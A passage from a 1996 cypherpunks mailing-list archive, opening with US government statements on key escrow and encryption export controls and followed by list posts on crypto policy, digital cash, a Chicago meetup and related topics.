Fourth, this approach fails to acknowledge the volume of messages that could need decoding.   Each wiretap results in the collection of thousands of messages relevant to the investigative  purpose of the wiretap.  Even under the most ideal conditions, had these messages been  encrypted, the computing resources required to decrypt them quickly would simply not be  available.  And this example does not include the additional burden of decrypting, if possible, any  digital information such as computer disks that are seized as evidence after a crime has been  committed.

Finally, revealing the precise capabilities of law enforcement agencies to decode messages, as  would be necessary in order to present the fruits of that work as evidence in court, could provide  a tutorial to criminal elements bent on eluding law enforcement. 

No restrictions apply to the U.S. domestic use of cryptography, and the administration has no plan  to seek restrictions. Cryptography has long been controlled for export for national security  reasons, so as to keep it from getting into the hands of foreign governments.  But it has today  become a dual-use technology, and international businesses want to use the same security products  both domestically and abroad.  The administration is thus under strong pressure to provide relief  from cryptography export controls.

For our cryptography polIcy to succeed, it must be aligned with commercial market forces and  operate on an international basis.  Further, it should preserve and extend the strong position that  U.S. industry enjoys in the global information systems marketplace.  Accordingly, the U.S.  government is working with U.S. industry and our international trading partners on an approach  that will protect information used in legitimate activities, assure the continued safety of Americans  from enemies both foreign and domestic, and preserve the ability of the U.S. information systems  industry to compete worldwide.

Key Management and Recovery

A consensus is emerging around the vision of a global cryptography system that permits the use of  any encryption method the user chooses, with a stored key to unlock it when necessary. The  encryption key would be provided voluntarily by a computer user to a trusted party who holds it  for safe keeping.  This is what many people do with their house keys -- give them to a trusted  neighbor who can produce them when something unexpected goes wrong.  Businesses should find  this attractive because they do not want to lock up information and throw away the key or give an  employee -- not the company -- control over company information.  An individual might also use  this service to ensure that she can retrieve information stored years ago.  This will require a new  infrastructure, consisting of trusted parties who have defined responsibilities to key owners.   Under law, these trusted emergency key recovery organizations would also respond in a timely  manner to authorized reques!
!
ts from law enforcement officials who required the key to decode  information lawfully obtained or seized from a subject of investigation or prosecution. 

The federal government will use key recovery encryption on its own computers because it makes  good management sense.  It would be irresponsible for agencies to store critical records without  key recovery, risking the loss of the information for programmatic use and the inability to  investigate and prosecute fraud or misuse of the information. 

A number of U.S. and international companies are working with the U.S. and other governments  to create a system of trusted parties who are certified to safeguard the keys.  In some cases,  organizations might guard their own keys.  In other cases, persons will use the key recovery  services provided by third parties, one of a suite of services that will include electronic directories  and electronic "notaries" in support of online commerce.  Persons will be  free to choose the type  and strength of encryption that provide the degree of security they believe appropriate for their  use.  Taken together, an overall key management infrastructure is needed to make electronic  commerce practical on a global scale.

Some commercial products and services which provide emergency key recovery are already  available.  Testing and refinement is needed before a widespread, robust infrastructure is put in  place.  The U.S. government is committed to supporting the development of such a key  management infrastructure through pilots and experimental trials.  The State Department is  expediting the review of several export license applications that test commercial key recovery on  an international scale.  An interagency working group is identifying several potential  governmental uses of commercial cryptography -- both internal transactions and in  communications with the public -- where key recovery can be tested.  A plan outlining these  government tests will be available in August.  The government will be purchasing key recovery  products for its own use and will adopt a federal standard for evaluating such products to assure  agency purchasers that the key recovery features operate properly.  T!
!
he Department of  Commerce will be establishing an industry-led advisory committee to make recommendations  regarding such a standard this summer.

While we are open to other alternatives, a key recovery system is the only approach we know of  that accommodates all public safety interests.  And even it is imperfect.  Some people will not join  voluntary systems, preferring to run the risk of losing their keys and being unable to recover their  encrypted information.  Although in some countries (e.g., France) mandatory key escrowing is  already in effect, we are pursuing a market-driven approach in part because we hope and believe  that key recovery will develop as a cost-effective service in an electronic commerce  infrastructure.  We are encouraged in this effort by recent discussions we have had at the  Organization for Economic Cooperation and Development (OECD) that are leading to  international cryptography management principles which support key recovery. 

Export Controls

No matter how successful we are in realizing this vision, American users of computer technology  are demanding stronger encryption for international use now.  Although we do not control the use  of encryption within the U.S., we do, with some exceptions, limit the export of non-escrowed  mass market encryption to products using a key length of 40 bits. (The length of the encryption  key is one way of measuring the strength of an encryption product.  Systems using longer keys  are harder to decrypt.)  U.S. industry asserts that it is losing overseas sales to its European and  Japanese competitors because it cannot include stronger cryptography as a component of its  commercial software and hardware products.  It warns that loss of a significant share of the world  information systems market would cause serious economic damage to the U.S.  economy and  could reduce the U.S. government's ability to influence the long-term future of global  cryptography.  It also argues that, beca!
!
use customers do not want to use one product in the U.S.  and a different one overseas, export controls are causing U.S. firms to provide an unsatisfactory  level of protection to their electronic information, making them vulnerable to industrial espionage  by their competitors and foreign governments.

While 40 bit encryption products are still strong enough for many uses, the administration  recognizes that some export liberalization may be useful to build support for a key management  regime.  Accordingly, we are actively considering measures that would provide limited,  temporary relief from cryptographic export controls in exchange for real, measurable  commitments from industry (e.g., investments in products that support key recovery) toward the  building of a key management infrastructure.  The liberalization proposals under discussion,  which would continue the current one-time review of products by the National Security Agency,  include: permitting products using longer key lengths to be exported to specific industry sectors  such as health care or insurance (similar to current policy for the financial sector); allowing export  of non-escrowed products to a list of trustworthy firms beyond those sectors, with provisions for  monitoring compliance to prevent product d!
!
iversion to other firms; export of cryptography-ready  operating systems; and, most dramatically, the transfer of jurisdiction over commercial encryption  products from the State Department's munitions list to the Commerce Department's list of  dual-use technologies.   Our goal is to obtain commitments from industry by the fall. 

We must, however, be careful in any relaxation of controls.  Other governments' law  enforcement and national security needs to access material encrypted with U.S. products could  drive them to erect trade barriers by imposing import controls on strong non-escrow encryption  products.  In addition, we do not want to do anything that would damage our own national  security or public safety by spreading unbreakable encryption, especially given the international  nature of terrorism.  Even 40 bit encryption, if widespread and not escrowed, defeats law  enforcement.

It is for these reasons that we oppose the legislation (S. 1726) introduced in this Congress by  Senator Burns and co-sponsored by Senator Lott and former Senator Dole.  Although it contains  some provisions, such as the transfer of export control jurisdiction for commercial cryptography  to the Commerce Department, with which we could agree if constructed with appropriate  safeguards, the bill is unbalanced and makes no effort to take into account  the serious  consequences of the proliferation it would permit.

The importance of the U.S. information technology industry, the security stakes, and increasing  congressional interest make it clear that there is an urgent need for clear policy and direction.   The administration's proposed approach is broadly consistent with industry suggestions and the  conclusions reached by the National Academy of Sciences in its report.  That report recognizes  the need to address a complex mix of commercial and security issues  in a balanced manner.  We  agree with that need.  We also agree with the report's recommendation that export controls on  encryption products need to be relaxed but not eliminated, and are actively considering ways of  providing short-term relief.  (We do not agree with the report's recommendation that we eliminate  most controls on 56-bit key length products.)  Finally, we agree that key escrow is a promising  but not fully tested solution, and are promoting the kinds of testing the report recommends as a  way of demonstrating!
!
 the solution's viability while providing stronger encryption internationally. 

We will continue discussions with industry, other members of the private sector, the Congress,  and governments at all levels to arrive at a solution that promotes a future of safe computing in a  safe society.

(end text)

TEXT: ADMINISTRATION STATEMENT ON COMMERCIAL ENCRYPTION
(International agreement sought for security, safety)

WASHINGTON -- The Clinton administration has proposed a framework for an international  agreement that would give law-enforcement officials around the world some access to encrypted  information in telephone transmissions, electronic mail and Internet communications. 
A July 12 press release from the U.S. Department of Commerce gives the essence of the  proposal, which would entail use of private-sector third parties who would hold spare keys to  encryption tools and would surrender them to law-enforcement officials having proper ‹uthority. 
While developing this proposal, the administration would consider relaxing U.S. export controls  on encryption technology.

Following is the text of the administration statement:

(begin text)

Administration Statement on Commercial Encryption Policy

The Clinton administration is proposing a framework that will encourage the use of strong  encryption in commerce and private communications while protecting the public safety and  national security.  It would be developed by industry and will be available for both domestic and  international use.

The framework will permit U.S. industry to take advantage of advances in technology pioneered  in this country and to compete effectively in the rapidly changing international marketplace of  communications, computer networks, and software.  Retaining U.S. industry's leadership in the  global information technology market is of longstanding importance to the Clinton administration. 
The framework will ensure that everyone who communicates or stores information electronically  can protect his or her privacy from prying eyes and ears as well as against theft of, or tampering  with, their data.  The framework is voluntary; any American will remain free to use any  encryption system domestically.

The framework is based on a global key management infrastructure that supports digital signatures  and confidentiality.  Trusted private-sector parties will verify digital signatures and also will hold  spare keys to confidential data.  Those keys could be ortained only by persons or entities that have  lost the key to their own encrypted data, or by law enforcement officials acting under proper  authority.  It represents a flexible approach to expanding the use of strong encryption in the  private sector.

This framework will encourage commerce both here and abroad.  It is similar to the approach  other countries are taking and will permit nations to establish an internationally inter-operable key  management infrastructure with rules for access appropriate to each country's needs and  consistent with law enforcement agreements.  Administration officials are currently working with  other nations to develop the framework for that infrastructure. 
In the expectation of industry action to develop this framework internationally and recognizing  that this development will take time, the administration intends to take action in the near term to  facilitate the transition to the key management infrastructure. 
The measures the administration is considering include:

1.   Liberalizing export controls for certain commercial encryption products. 
2.   Developing, in cooperation with industry, performance standards for key recovery systems  and products that will be eligible for general export licenses and technical standards for products  the government will purchase.

3.   Launching several key recovery pilot projects in cooperation with industry and involving  international participation.

4.   Transferring export control jurisdiction over encryption products for commercial use from the  Department of State to the Department of Commerce.

Administration officials continue to discuss the details of these actions with experts from the  communications equipment, computer hardware and software industries, civil liberties groups and  other members of the public to ensure that the final proposal balances industry actions towards the  proposed framework, short-term liberalization initiatives, and public safety concerns.  
The administration does not support the bills pending in Congress that would decontrol the export  of commercial encryption products because of their serious negative impact on national security  and law enforcement.  Immediate export decontrol by the U.S. could also adversely affect the  security interests of our trading partners and lead them to control imports of U.S. commercial  encryption products.

A Cabinet committee continues to address the details of this proposal.  The committee intends to  send detailed recommendations to the president by early September, including any  recommendations for legislation and executive orders.  The committee comprises the secretaries  of State, Defense, Commerce and Treasury; the attorney general; the directors of Central  Intelligence and the Federal Bureau of Investigation; and senior representatives from the Office of  the Vice President, the Office of Management and Budget, and the National Economic Council. 
(end text)

SENATORS, ADMINISTRATION CLASH OVER ENCRYPTION CONTROLS
(Bill would allow more exports)
By Bruce Odessey
USIA Staff Writer

WASHINGTON -- Clinton administration officials and members of a Senate committee have  clashed over policy on export controls for advanced encryption technology. 
At issue at a July 25 Senate Commerce Committee hearing was a bill that would relax those  controls by allowing U.S. exports of any encryption technology that was already generally  available for sale in foreign markets.

Encryption is the use of a string of letters or numbers -- known as a "key" -- that renders  computer files and digital transmissions unreadable to those without access to the code.  The  complexity of the key is measured in bits.

Present regulations prohibit U.S. exports of encryption products using a key length of more than  40 bits.

"It is widely agreed that 40-bit security equals no security.  It is simply too easy to break," said  Senator Larry Pressler, committee chairman.  "However, U.S. companies are not allowed to  provide products at this level abroad ....  This is a boon for our foreign competitors.  They are  actively developing markets we are forced to abandon."

Senators of both parties expressed dissatisfaction with an administration policy announced July 12.   The policy would allow some relaxation of the export controls but only if U.S. industry lent  support to an administration proposal for a global cryptography system -- called an internationally  inter-operable key management infrastructure, or a key escrow system. 
A number of governments in the Organization for Economic Cooperation and Development  (OECD) are already working to create such a system.  Under it, non-government parties would  hold encryption keys in escrow; law-enforcement officials with court authority would have access  to the keys to unscramble data transmissions, telephone conversations and electronic mail in  criminal or terrorism investigations.

Supporters of the bill and administration officials opposed to it differed not only about interpreting  the facts but also about the facts themselves.


For example, one issue concerns whether attempts to control  encryption technology are already too late because advanced products -- including 56-bit  products available for downloading for free from sites on the Internet -- are already widely  available.

"Some observers say the encryption genie is out of the bottle and that attempts to influence the  future use of encryption are futile," said Louis Freeh, director of the Federal Bureau of  Investigation (FBI).  "This is not true, in my view."

He argued that a little time remains to protect public safety because few people use encryption  technology yet.

"Some strong encryption products can be found overseas, but they have not yet become  embedded in mainstream operating systems, which I think is a critical distinction," Freeh said.   "There is still a window of opportunity for us to act here. 
Administration officials guessed that countries might have two years yet to reach international  agreement before the infrastructure builds up to make robust encryption products widely useful. 
An agreement could help create an infrastructure open to scrutiny by law-enforcement officials  around the world through key management.  Then, even if wealthy criminal or terrorist  organizations used advanced non-key escrow technology to block interception of communications  among their own members, law-enforcement officials could still scrutinize their external  communications to banks and other legitimate businesses conducted with key escrow products. 
That was the Clinton administration view, anyway, but it was not shared by many on the Senate  Commerce Committee.

"Is it possible to get every country on the planet to agree to this approach," asked Senator Conrad  Burns, a Montana Republican who is sponsoring the bill, "and, if we cannot, wouldn't the entire  approach be undermined if one or more countries chose not to adopt such an approach?" 
Senator Ron Wyden, an Oregon Democrat, said the Clinton policy would force U.S. industry  permanently behind foreign competitors.

"The terrorists and drug merchants of the 21st century are not going to be encryption simpletons,"  Wyden said.  "Many of them are going to be savvy and sophisticated, and they are going to be  hunting worldwide for these data-scrambling products," not just from U.S. suppliers. 






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Wed, 31 Jul 1996 11:31:42 +0800
To: cypherpunks@toad.com
Subject: Re: You know it's getting late when... (fwd)
Message-ID: <199607310124.UAA03960@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Hi all,

Forwarded message:

> Subject: Re: You know it's getting late when...
> Date: Tue, 30 Jul 1996 18:36:38 -0500 (CDT)
> From: ichudov@algebra.com (Igor Chudov @ home)
> > 
> > Ostensibly, one of the reasons for having a free and fair political system 
> > is so people will not be inclined to throw bombs and plot violent 
> > revolution.  Grandly ignoring this, that reporter seems to take the 
> > diametrically opposite tack:  A totalitarian government can best avoid 
> > bombings and violence.
> > 
> Actually the graph goes like this: 
> 
> ^ Non-State Terrorism
> |
> |            ..-..
> |          /~     \
> |       .-~        \
> |..---/~            ~-.
> +------------------------------------------------> Level of Totalitarianism
> 
> ^ State Terrorism
> |
> |          -------------------------------------
> |       .-~
> |    .-~
> | .-~
> |/
> +------------------------------------------------> Level of Totalitarianism
> 

So we should take your personal opinion as fact? What statistics do you base
this on? What are the vertical scales, number killed? What is the horizontal
scale measured in, number wanted to kill?

I suspect it simply is not possible to measure such a phenomena as terrorism
as anything other than a simple counting game. The problem becomes quite
quickly, what qualifies as terrorism?

Consider (to some) a trivial example. There are 20 million cats and dogs
killed each year because somebody was irresponsible. The vast majority of
these are or were pets (not feral or wild animals as some would claim) which
persons simply didn't want anymore. Now there is somewhere around 250
million people in the US. This means that 1 out of 10 (roughly) are costing
the rest of us about $50 ea. to take care of their pet 'problem'.

I see no difference in having my money taken via taxes (where most of it
comes from) for this than having somebody come and take $50 for whatever
reason by kicking my front door in. Why am I being forced to pay this money
to pay for somebody elses lack of discipline and simple human empathy?

                                               Jim Choate





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carl Ellison <cme@ACM.ORG>
Date: Wed, 31 Jul 1996 10:55:32 +0800
To: Dave Banisar <banisar@epic.org>
Subject: Re: Freeh Testimony 7/25/96
In-Reply-To: <199607262009.NAA00790@comsec.com>
Message-ID: <v03007608ae24596b3a0f@[168.143.8.144]>
MIME-Version: 1.0
Content-Type: text/plain


I wish someone had asked Freeh directly whether he granted, in saying:

>First and foremost, the law enforcement community fully supports a
>balanced encryption policy that satisfies both the commercial needs of
>industry and law abiding individuals for robust encryption products [...]

that law abiding industry and individuals have a legitimate need to keep
information private from the US government -- and especially the FBI.



+------------------------------------------------------------------------+
|Carl M. Ellison   cme@acm.org     http://www.clark.net/pub/cme          |
|PGP: E0414C79B5AF36750217BC1A57386478 & 61E2DE7FCB9D7984E9C8048BA63221A2|
|  "Officer, officer, arrest that man!  He's whistling a dirty song."    |
+-------------------------------------------- Jean Ellison (aka Mother) -+






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Wed, 31 Jul 1996 13:15:36 +0800
To: strix@rust.net
Subject: Chicago Area Physical Meet--
Message-ID: <Pine.LNX.3.93.960730203334.1985A-100000@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


     I just realized that I didn't put a subject on the last post I made I 
didn't put a Subject on it. Any way, the post, and a correction:

Correction: The web page is at http://www.encodex.com/cpunk. 

     Here is the original e-mail:

>From snow@smoke.suba.com Fri Jul 26 12:13:09 1996
Date: Fri, 26 Jul 1996 12:12:57 -0500 (CDT)
From: snow <snow@smoke.suba.com>
To: cypherpunks@toad.com
cc: alex@suba.com, andrew_loewenstern@il.us.swissbank.com, cabeen@netcom.com, 
    erehwon@c2.org, lzkoch@mcs.net, paulrice@midway.uchicago.edu, 
    somebody@tempest.ashd.com, strix@rust.net
Message-ID: <Pine.LNX.3.93.960726114143.1310A-100000@smoke.suba.com>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Status: RO
X-Status: 


     As previously discussed, I am announcing a Greater Chicago Area 
CypherPunks Physical Meet. 

     The date is Saturday, 3 August 1996 at or around 4 p.m. at 
Ye Olde Saint Andrews Pub, 5938 N. Broadway, Chicago Il. Instructions are 
at the end of this post. 

     Things _I_ would like to discuss, of course, this is me, so it is very
amenable to changer:

     1) Setting up a Chicago Area Remailer, not simply running a single
remailer on a single account, but trying to go one better. 

     2) Discuss the possibility of a public event to spread the word about
cryptography/encryption. 

     3) Discuss the next meeting. 

The reasons for selecting St. Andrews Inn:

     1) It is relatively empty. 
     2) It has Food (Supposedly real good shepard's pie, made from real 
shepards(I asked)), Drink (Cider, and they know what snakebite is), and 
Non-alcoholic beverages. 
     3) It is easy (relatively) to get to. 


To get to St. Andrews Inn:

     By Car: Take Lake Shore Drive North until the LSD ends. 
             Go North on Sheridan (right turn off of LSD) to Thorndale 
                (About 5900 North) 
             Turn left on Thorndale (heading west) and drive to Broadway 
                (About 4 or 5 blocks) 
             Park. 
             St. Andrews is on the North West Corner of the intersection, 
                 under the green awning. 
      
     By El: Take the Red Line (Howard/Dan Ryan) to Thorndale 
            Go west 1/2 block from the El, This is Broadway
            St. Andrews is on the North West Corner of the intersection, 
                under the green awning. 

     I will try to have a map up at http://www.encodex.com/cpunk 
later today.
 
Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@smoke.suba.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aba@atlas.ex.ac.uk
Date: Wed, 31 Jul 1996 07:35:22 +0800
To: cypherpunks@toad.com
Subject: crypto CD source
Message-ID: <16689.9607301944@exe.dcs.exeter.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain



Some time ago on the list there was some discussion of putting
together a CD full of cryptographic software and reference material.
Nothing came of it, but I think several people expressed an interest,
for those of you who were interested, take a look at:

	http://www.sevenlocks.com/

Only problem is the price:

	http://www.sevenlocks.com/Encyclopedia.htm

		Single issue                           $195
           	One-year subscription (4 issues)       $695 ($174/issue)
                Two-year subscription (8 issues)       $995 ($124/issue)

Ouch!  Bit pricy, perhaps they justify it by the value added
information they've supplied?

Interesting that they keep the information up-to-date, one issue per
quarter.

They have a large supply of crypto software available on-line as well.
(No mention of ITAR on their software down load pages (78 Mb of
security related software they claim), and it looks you could download
the lot even if you weren't in the US).

Adam
--
#!/bin/perl -sp0777i<X+d*lMLa^*lN%0]dsXx++lMlN/dsM0<j]dsj
$/=unpack('H*',$_);$_=`echo 16dio\U$k"SK$/SM$n\EsN0p[lN*1
lK[d2%Sa2/d0$^Ixp"|dc`;s/\W//g;$_=pack('H*',/((..)*)$/)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Wed, 31 Jul 1996 08:00:46 +0800
To: cypherpunks@toad.com
Subject: CPC_ode
Message-ID: <199607302100.VAA02602@pipe2.t1.usa.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   AmBank, July 29, 1996: 
 
      Technologists at banks with large overseas operations 
      have drawn encouragement from a National Research 
      Council report suggesting that businesses be allowed 
      stronger forms of data encryption. Although financial 
      transactions are generally exempt from encryption 
      restrictions, bankers advocate more freedom in the 
      market. They complain that government officials often 
      refuse their requests for international use of 
      applications with strong cryptography -- and give no 
      reasons for their decisions. 
 
 
   NiSaShi, July 23, 1996: 
 
      Japan ID Tech, an Osaka-based information technology 
      startup, has developed a system for encoding text as 
      graphical images that can be sent via fax over normal 
      communications transmission lines. The system consists 
      of software that converts text to a two-dimensional bar 
      code called a CP code, which is gaining popularity as a 
      next-generation coding system. The company's encoding 
      program also incorporates DES. 
 
 
   MiPa, July 29, 1996: 
 
      Patent: Method and system for key distribution and 
      authentication in a data communication network (IBM). 
 
      Inventors: Bjorklund, Ronald E.; Bauchot, Frederic; 
      Wetterwald, Michele M.; Kutten, Shay; Herzberg, Amir.  
 
 
   ----- 
 
   http://jya.com/cpcode.txt  (for 3, 11 kb) 
 
   CPC_ode 
 
 
 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carl Ellison <cme@cybercash.com>
Date: Wed, 31 Jul 1996 11:31:15 +0800
To: frantz@netcom.com (Bill Frantz)
Subject: Re: Usenet Conference on Security
Message-ID: <2.2.32.19960731010837.00641a80@cybercash.com>
MIME-Version: 1.0
Content-Type: text/plain


At 03:55 PM 7/26/96 -0700, Bill Frantz wrote:

>While the Department of Justice guy (whose name slips my mind) was saying 4
>horsemen over and over (really an oversimplification of his position),

The person was Scott Charney.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Johnston-Lawrence Berkeley Laboratory-ITG <johnston@george.lbl.gov> (by way of Carl Ellison <cme@cybercash.com>)
Date: Wed, 31 Jul 1996 11:52:16 +0800
To: dccp@eff.org
Subject: Call for Abstracts (Multimedia Data Security)
Message-ID: <2.2.32.19960731010839.006b7c80@cybercash.com>
MIME-Version: 1.0
Content-Type: text/plain


                A Call for Abstracts

As part of SPIE's EI '97 Electronic Imaging: Science and Technology
8-14 February 1997
San Jose Convention Center 
San Jose, California USA 
(http://www.spie.org/web/meetings/calls/pw97/pw97call_ei.html)


Multimedia Data Security

The growth of the use of public networks as the platform for multimedia
applications in the past year has made it important to devise
mechanisms for ensuring proper use of intellectual property and
increased the importance of employing security mechanisms for video and
audio data. This conference will serve as a forum for the exchange of
ideas in the areas of security systems and mechanisms especially in
applications that handle large data volumes.

Papers are solicited in all areas of security systems and algorithms
including but not limited to:

- security systems for imaging applications 
- security systems for real time video applications 
- performance studies and comparisons for securing image data 
- watermarking and detection of fraudulent copying of intellectual property 
- metering schemes for intellectual property usage 
- audio and video encryption mechanisms 
- key management and security protocols for broadcast applications 
- payment systems for online multimedia applications 
- content protection mechanisms for online multimedia distribution. 

Please submit abstracts to Bill Johnston (johnston@george.lbl.gov)
by August 15, 1996.









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Kevin Stephenson <cts@deltanet.com>
Date: Wed, 31 Jul 1996 14:30:35 +0800
To: Igor Chudov <ichudov@algebra.com>
Subject: Re: Taxes in the digicash world
In-Reply-To: <199607301117.GAA06799@manifold.algebra.com>
Message-ID: <31FEDF34.18FA@deltanet.com>
MIME-Version: 1.0
Content-Type: text/plain


Igor Chudov @ home wrote:
> 
> Hi
> 
> Suppose that digital cash becomes easy enough to use and becomes the
> mainstream medium in most [or at least many] economic transactions.
> 
> The question is, how can the government TECHNICALLY collect taxes?
> I do not mean to start `libertarianism vs. socialism' discussion, I
> am more interested in the technical aspects of tax collection when
> transfers of money are protected by strong crypto..
> 
> Let's say, maybe this tax would work: every time someone verifies that
> a piece of digital cash is valid, s/he has to pay the government a little
> percentage of the amount. Since digital banks are easier to control than
> other participants of the market, this kind of tax legislation is easier to
> enforce.
> 
> Of course these banks may be offshore, and then such collection
> becomes problemstic.
> 
> Another alternative that I see is property taxes and poll taxes,or
> taxes on some commodities such as oil. But incomes seem to be hard to
> track.
> 
> What else?
> 
>         - Igor.

Governments consume a certain percentage of their nations gross
domestic product. They will do whatever it takes to make sure
their "cut" doesn't go down.

The world will never live on information alone. There is always going
to be a need for physical transactions. The government will just raise
taxes on anything tangible. The lower class will end up paying a larger
percentage of taxes because they utilize information/service 
technologies less then the middle and upper classes. The government and
its "distributed wealth" ideals, will raise property taxes to try to
even the load over the populace.

Another idea is that the government will start taxing shipments. You
buy a CD with your e-money, but it still has to be shipped. They can
force the shipper to declare the value of the contents and collect the
tax when the box arrives at your doorstop. This would be very hard to
implement, but I wouldn't rule anything out at this point.

When information and service becomes untaxable, you will see some very
creative new taxes emerge. I have an idea for fully anonymous, offshore
accountless electronic cash, but feel that the effort to implement it
might be futile if the government were to ban any such successful
technology.


*** .sig under construction ***




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Wed, 31 Jul 1996 12:50:43 +0800
To: cypherpunks@toad.com
Subject: update.281 (fwd)
Message-ID: <199607310230.VAA04062@einstein>
MIME-Version: 1.0
Content-Type: text



Hi all,

Forwarded message:

> Date: Mon, 29 Jul 96 10:18:54 EDT
> From: physnews@aip.org (AIP listserver)
> Subject: update.281
> 
> PHYSICS NEWS UPDATE                         
> The American Institute of Physics Bulletin of Physics News
> Number 281  July 29, 1996  by Phillip F. Schewe and Ben Stein
> 
> SOLAR NEUTRINO FLUX IS NOT CORRELATED WITH
> SUNSPOT ACTIVITY.  The Kamiokande detector, situated a
> 
> THE PHYSICS OLYMPIAD IN OSLO, like the sports Olympiad
> 
> TUNNEL JUNCTION MAGNETORESISTANCE may lead to
> higher-density magnetic storage devices.  Physicists have known for
> some time that sandwiches of alternating magnetic and nonmagnetic
> microlayers can undergo a change in electrical resistance in the
> presence of an external magnetic field (arising, say, from a tiny
> domain on a segment of magnetic tape).  This magnetoresistance
> (MR) effect  can be used to decode binary data and has been
> employed in reading heads in computer hard drives.  Giant
> magnetoresistance (GMR), a stronger version of MR, affords even
> greater data-decoding sensitivity.  Prototype hard-drives with read
> heads using GMR have achieved areal data densities of 3
> Gbits/sq.in. Tunnel junction magnetoresistance (JMR) is yet another
> approach to transforming a tiny magnetic field into a change in
> resistance.  Unlike the all-metal GMR sensor, a room-temperature
> JMR sensor consists of two metal (ferromagnetic) layers  separated
> by an insulating layer.  A JMR trilayer junction tested recently at
> MIT is only 20 nm thick  and the signal (the fractional change in
> resistance) was 23%, compared to a signal of less than 7%  for a
> 40-nm-thick, 4-layer GMR prototype.  MIT physicist Jagadeesh
> Moodera (moodera@slipknot.mit.edu; 617-253-5423) suggests that
> the more compact size, relatively larger signal, and the low sub-nanoamp operating current of the JMR sensor could make for easier
> engineering of devices and lower production costs.  An areal density
> of more than 10 Gbits/sq.in. is possible, he says.  (J.S. Moodera et
> al., Applied Physics Letters, 29 July.)
> 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Arun Mehta <amehta@giasdl01.vsnl.net.in>
Date: Wed, 31 Jul 1996 03:59:56 +0800
To: sparks@bah.com (Charley Sparks)
Subject: Re: A Libertine Question
Message-ID: <1.5.4.32.19960730154922.0030f230@giasdl01.vsnl.net.in>
MIME-Version: 1.0
Content-Type: text/plain


At 16:42 29/07/96 CST, Roy M. Silvernail wrote:

>typical 'liberal' solutions to social problems seem (at least to me) all
>centered around disallowing failure. 
...
>I like to point out that evolution always requires multiple generations,
>and that when nothing dies, nothing evolves.

Just a thought...

Evolution also works better with a rich, diverse gene pool. If we
define "failure"
by the narrow standards of today's needs, and allow those who fail to die,
we may be left with people completely unequipped to cope with the radically
changed environments that future generations might face. "The first ones now
may later be last, for the times, they are a-changing."

BTW, have you read "Watership Down" by (forgot the first name) Adams? It
illustrates what I am trying to say rather well.

Arun Mehta Phone +91-11-6841172, 6849103 amehta@cpsr.org
http://www.cerfnet.com/~amehta/  finger amehta@cerfnet.com for public key





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Wed, 31 Jul 1996 14:02:54 +0800
To: Sandy Sandfort <sandfort@crl.com>
Subject: Re: VISA Travel Money
In-Reply-To: <Pine.SUN.3.91.960730160836.11115C-100000@crl8.crl.com>
Message-ID: <Pine.LNX.3.93.960730215245.174C-100000@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 30 Jul 1996, Sandy Sandfort wrote:
> It sounds VERY promising to me.  Though I'm sure Jim's conjecture
> about linking transactions is correct, I don't see how such an
> aonymous payment system could not be useful in preserving privacy.
> One could purchase several of these cards--preferably in the 
> smallest denominations consistent with their mission.  Each card
> could be used so that its audit trail left whatever impression
> one wished to leave.
> 
> Of course, if you are arrested with one or more of them on you,
> they could be used to tie you to times, places and activities
> with which you might not wish to be associated.  Proper handling
> could obviate or reduce this risk however.
> 
> It's not as anonymous as cash, but it might draw a lot less
> attention in my circumstances.  I think it has a place in one's
> aresenal of privacy enchancing technologies.

     This card has the value "written" when you "purchase" it right? 

    Any one wanna bet on how long it will take the "Hacker" Community
to figure out how to "refill" it? Otherwise all you have is a 
debit card. 

Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@smoke.suba.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Arun Mehta <amehta@giasdl01.vsnl.net.in>
Date: Wed, 31 Jul 1996 04:08:24 +0800
To: cypherpunks@toad.com
Subject: Re: Let's Say "No!" to Single, World Versions of Software
Message-ID: <1.5.4.32.19960730155744.00313f30@giasdl01.vsnl.net.in>
MIME-Version: 1.0
Content-Type: text/plain


At 15:13 30/07/96 -0700, Timothy C. May wrote:
>
>It is imperative that Netscape, Microsoft, Qualcomm, and the other players
>be pressured/urged/cajoled to commit to introducing strong, unescrowed
>crypto for the *domestic* versions, even if not for export versions.

I agree. Foreign buyers will look askance at software that is
"second grade" in security terms, just so the US government can
read their mail. This will encourage non-US software companies to
fill the vacuum, and US companies will get pissed off and pull
some strings in Washington.

Arun Mehta Phone +91-11-6841172, 6849103 amehta@cpsr.org
http://www.cerfnet.com/~amehta/  finger amehta@cerfnet.com for public key





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Julian Assange <proff@suburbia.net>
Date: Tue, 30 Jul 1996 23:22:30 +0800
To: coderpunks@toad.com
Subject: DESZIP
Message-ID: <199607301201.WAA21682@suburbia.net>
MIME-Version: 1.0
Content-Type: text



I am writing an historical piece on crypt(3) optimisation and password
guessing heuristics. This naturally enough envolves tracking down and
analysing various code/papers that have been seen as significant and/or
infulential in those areas.

In the late 80's Matt Bishop while at NASA, wrote DESZIP, which for a
while was the seminal work. Matt has pointed me to a US summer 1987
article which describes some of the DES optimisations, however as I am
an Australian national, Matt can not legally send me the actual
